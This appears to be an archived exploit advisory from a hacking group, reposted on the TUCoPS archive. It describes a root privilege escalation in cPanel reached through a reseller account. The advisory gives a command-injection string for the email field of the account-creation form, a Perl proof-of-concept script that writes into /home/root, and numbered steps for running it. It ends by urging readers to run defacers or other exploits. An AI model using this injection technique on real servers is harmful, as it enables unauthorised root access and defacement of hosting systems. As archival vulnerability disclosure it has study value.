Visit our newest sister site!
Hundreds of free aircraft flight manuals
Civilian • Historical • Military • Declassified • FREE!


TUCoPS :: Web :: Adminware, Control Panels :: bx3200.htm

Cpanel all version >> root access with a reseller account.



Cpanel all version >> root access with a reseller account.
Cpanel all version >> root access with a reseller account.



By : Ali Jasbi ( IHST security & hacking Research team) WwW.Hackerz.ir=0D 
Vendor : Cpanel.net=0D
Version : ALL !!=0D
Risk : Very high=0D
What u can do with this bug is :=0D
u can have a access to all the server with reseller privilege (Th3 r00t)=0D
how it's work ?=0D
when u want to create an account in shell what will happen ?=0D
./script/wwwact [domainname] [username] [password] [Email address] lab lab lab=0D
that u can run it with a web base program ! ( cpanel : doamin:2086)=0D
example :=0D
http://domain:2086/scripts/wwwacct [domainname] [username] [password] [Email address] lab lab lab=0D 
it means you got a access to wwwacct in the scripts folder (Th3 r00t)=0D
so u can run other command with root access like that=0D
./scripts/wwwactt domain.com domain password ali@hackerz.ir;./home/hackerz/public_html/do.pl ( your command now is ./home/hackerz/public_html/do.pl)=0D 
that u can Likewise run it on the web base program.what u need to do is just write ali@hackerz.ir;./home/hackerz/public_html/do.pl in Email text box when u want to create an account.=0D 
()()()()()()()()()()()()()=0D
Test it:=0D
++++++++++++++++++++++++++=0D
Step 1=0D
=0D
Save this file in /home/user/public_html/do.pl .=0D
#!/usr/bin/perl=0D
$old='/home/user/public_html/test.txt';=0D
$new='/home/root/kon.txt';=0D
rename $old, $new;=0D
++++++++++++++++++++++++++=0D
step 2 =0D
=0D
make a text file named test.txt in your public_html directory.=0D
path will be : /home/user/public_html/test.txt .=0D
++++++++++++++++++++++++++=0D
step 3=0D
=0D
create an account and write ali@hackerz.ir;./home/user/public_html/do.pl in E-mail Address text box=0D 
then click on the "create" button.=0D
Yes , you can find your file in /home/root/ .=0D
++++++++++++++++++++++++++=0D
()()()()()()()()()()()()()=0D
you can run your own code !(mass defacer, exploit's or everything that u want).=0D
Enjoy it...


TUCoPS is optimized to look best in Firefox® on a widescreen monitor (1440x900 or better).
Site design & layout copyright © 1986-2014 AOH